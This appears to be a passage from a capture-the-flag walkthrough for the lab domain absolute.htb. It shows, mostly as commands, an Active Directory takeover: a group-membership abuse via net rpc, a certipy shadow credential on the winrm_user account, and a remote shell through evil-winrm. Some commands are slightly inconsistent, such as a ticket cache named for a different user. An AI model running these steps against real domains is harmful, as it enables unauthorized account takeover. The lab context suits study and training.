Get a Bloodhound result below. The m.lovegod owns the Network Audit group, which has GenericWrite on the winrm_user user.
To get access to the machine, I’ll first I’ll need to give m.lovegod write access on the Network Audit group. Then I can add m.lovegod to the group. Finally, I can use those permissions to create a shadow credential for the winrm_user account to access to the machine via evil_winrm.
Update the ownership of the user to add a 'write permission'.
# Domain: absolute.htb
# User: m.lovegod
# Group: Network Audit
Kali> kinit m.lovegod
Kali> net rpc group addmem "Network Audit" -U 'm.lovegod' -k -S dc.absolute.htb m.lovegod
# or
Kali> net rpc group members "Network Audit" -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb
Create a Shadow Credential.
# Let's find ADCS environment. You will see some ADCS configurations.
KRB5CCNAME=./d.klay.ccache certipy find -username m.lovegod@absolute.htb -k -target dc.absolute.htb
# Let's add the shadow credential to the winrm_user user
KRB5CCNAME=./d.klay.ccache certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
# Let's connect to the machine
KRB5CCNAME=./winrm_user.ccache evil-winrm -i dc.absolute.htb -r absolute.htb